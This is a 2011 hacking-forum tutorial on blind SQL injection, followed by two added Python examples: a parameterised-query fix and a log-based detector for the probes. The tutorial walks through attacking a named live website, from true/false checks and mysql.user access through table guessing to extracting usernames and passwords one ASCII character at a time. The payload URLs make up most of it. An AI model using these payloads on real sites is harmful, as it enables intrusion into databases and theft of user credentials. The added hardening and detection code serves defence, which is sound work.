 Blind SQL Injection (tutorial)

Author: __Dj_-k1ll3r__ (Super Moderator)
Posted: Thu Jul 21, 2011 8:02 pm

Blind SQL Injection

The dorks used to find vulnerable websites are exactly the same as for SQL Injection.

Let's say the site we want to hack is: http://www.nextlive.com/
We surf to the site until we go somewhere like this:
http://www.nextlive.com/page.php?id=18

To see if the site is vulnerable to SQL Injection we write " ' " at the end of the URL.
For Blind SQL Injection it's different. We write "and 1=1" at the end of the URL:
http://www.nextlive.com/page.php?id=18 and 1=1

Of course the "and 1=1" is valid. So we must write something that is invalid to see if the site is vulnerable.
If we put "and 1=2" at the end of the URL, the site will not load normally. That means that the site is vulnerable.

Now, to check which version the above website is running, we write the command "and substring(@@version,1,1)=4":
http://www.nextlive.com/page.php?id=18 and substring(@@version,1,1)=4

The site doesn't load normally. That means that the website is not running version 4.
If we change 4 to 5 :
http://www.nextlive.com/page.php?id=18 and substring(@@version,1,1)=5

The page loads normally. Now we know that the website is running SQL 5!

Another command that we should use is "and (select 1)=1":
http://www.nextlive.com/page.php?id=18 and (select 1)=1

If the page loads normally, that means that we can use the SELECT command.

Now let's see if we have access to mysql.user. We write "and (SELECT 1 from mysql.user limit 0,1)=1":
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from mysql.user limit 0,1)=1

The page must load normally.

Now let's try to find the tables and columns, and then the passwords we want!

Note: In Blind SQLi the only thing we get is a positive or negative response.
That means that we can't use information_schema in SQL 5 to find the data we want. We must guess.

With the command "and (SELECT 1 from users limit 0,1)=1" we check if the table users exists.
So we have the following URL:
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from users limit 0,1)=1

The page doesn't load normally. That means that this table doesn't exist!

Now I will try "tbl_accounts" as the table name. So the URL will be:
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from tbl_accounts limit 0,1)=1

And yes, we got a positive response! Now we must search for columns in that table:
http://www.nextlive.com/page.php?id=18 and (SELECT substring(concat(1,acc_password),1,1) from tbl_accounts limit 0,1)=1
and
http://www.nextlive.com/page.php?id=18 and (SELECT substring(concat(1,acc_username),1,1) from tbl_accounts limit 0,1)=1

We got 2 positive responses so we know that the columns acc_username and acc_password exist!

Now we are going to get data from those columns! Remember, here it will take us a long time to get data from the database.
We will work with ascii characters. To see them you can go here:
http://www.asciitable.com/

With the command: and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>ascii value
we select the user with user ID 1.

But since our attack is "blind", we said that we will work with ASCII characters to guess the password!
In place of "ascii value" we put the decimal (DEC) ASCII number of a character.

So if we write:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>20

We will get a positive response. But we continue until we get a negative response. What I mean is that we keep increasing the value 20 and stop when we get a negative response.

We try:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>30

Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>40

Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>60

Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>100

Negative! That means that now we decrease:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>95

Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>96

Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>97

Negative!

We know the character's ASCII value is bigger than 96 but not bigger than 97!
If we go to the website I gave you before, we will see that 97 is the character "a".

If now we change the command to:
and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),2,1))>ascii value
(we changed from "where acc_id=1),1,1))>" to "where acc_id=1),2,1))>")

This makes it check the second character. And we work in the same way.

Note:
The fact that a website is not vulnerable to SQL Injection does NOT mean that it is not vulnerable to Blind SQL Injection!
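
Added example (not part of the original post): the "and 1=1" / "and 1=2" test above only produces two different pages when the id parameter is concatenated into the SQL text. The Python sketch below uses a constructed in-memory SQLite table named pages as a stand-in for the site's backend and compares a concatenating handler with one that validates and binds the parameter; all function and table names are assumptions made for the illustration.

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory database standing in for the site's backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO pages VALUES (18, 'Welcome page')")
    return db


def page_vulnerable(db, raw_id):
    # Vulnerable: the id parameter is concatenated into the SQL text,
    # so anything after the number becomes part of the WHERE clause.
    sql = "SELECT body FROM pages WHERE id = " + raw_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def page_hardened(db, raw_id):
    # Hardened: check that the value is a plain integer, then bind it.
    # The database never parses the input as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # the application should answer 400 and log the request
    row = db.execute(
        "SELECT body FROM pages WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


def oracle_exists(handler, db):
    # The tutorial's test: a true condition and a false condition give
    # different pages. If they do, a positive/negative oracle exists.
    return handler(db, "18 and 1=1") != handler(db, "18 and 1=2")


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks an oracle:", oracle_exists(page_vulnerable, db))
    print("bound parameter leaks an oracle:  ", oracle_exists(page_hardened, db))
```

With the bound parameter both probes return the same empty result, so there is no positive or negative response to read. The mysql.user check in the post additionally relies on the application's database account having more privileges than it needs.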
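
Added example (not part of the original post): the character-by-character guessing described above leaves a recognisable trail in web server logs, namely one client sending a true/false condition pair and then many requests that differ only in the number compared against ascii(substring(...)). The Python sketch below flags such clients in a few constructed log lines; the log format, the threshold of three values and all names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines: client IP, request line, status.
SAMPLE_LOG = """\
203.0.113.7 "GET /page.php?id=18 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=18%20and%201=1 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=18%20and%201=2 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=18+and+ascii(substring((SELECT+x+from+t),1,1))>60 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=18+and+ascii(substring((SELECT+x+from+t),1,1))>100 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=18+and+ascii(substring((SELECT+x+from+t),1,1))>95 HTTP/1.1" 200
198.51.100.4 "GET /page.php?id=21 HTTP/1.1" 200
198.51.100.4 "GET /search.php?q=rock+and+roll HTTP/1.1" 200
"""

LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')
# "and 1=1" / "and 1=2" style constant comparisons in a parameter value.
CONSTANT_CMP = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)", re.I)
# ascii(substring(...)) compared against a number: one guess per request.
CHAR_PROBE = re.compile(
    r"ascii\s*\(\s*substr(?:ing)?\s*\(.*\)\s*[<>=]\s*(\d+)", re.I | re.S
)


def suspicious_clients(log_text, min_thresholds=3):
    stats = defaultdict(lambda: {"boolean": set(), "thresholds": set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        query = unquote_plus(target.partition("?")[2])  # decode %20 and +
        for a, b in CONSTANT_CMP.findall(query):
            stats[ip]["boolean"].add(a == b)
        probe = CHAR_PROBE.search(query)
        if probe:
            stats[ip]["thresholds"].add(int(probe.group(1)))
    flagged = {}
    for ip, s in stats.items():
        paired = s["boolean"] == {True, False}  # sent both a true and a false test
        if paired or len(s["thresholds"]) >= min_thresholds:
            flagged[ip] = {"true_false_pair": paired,
                           "thresholds": sorted(s["thresholds"])}
    return flagged


if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```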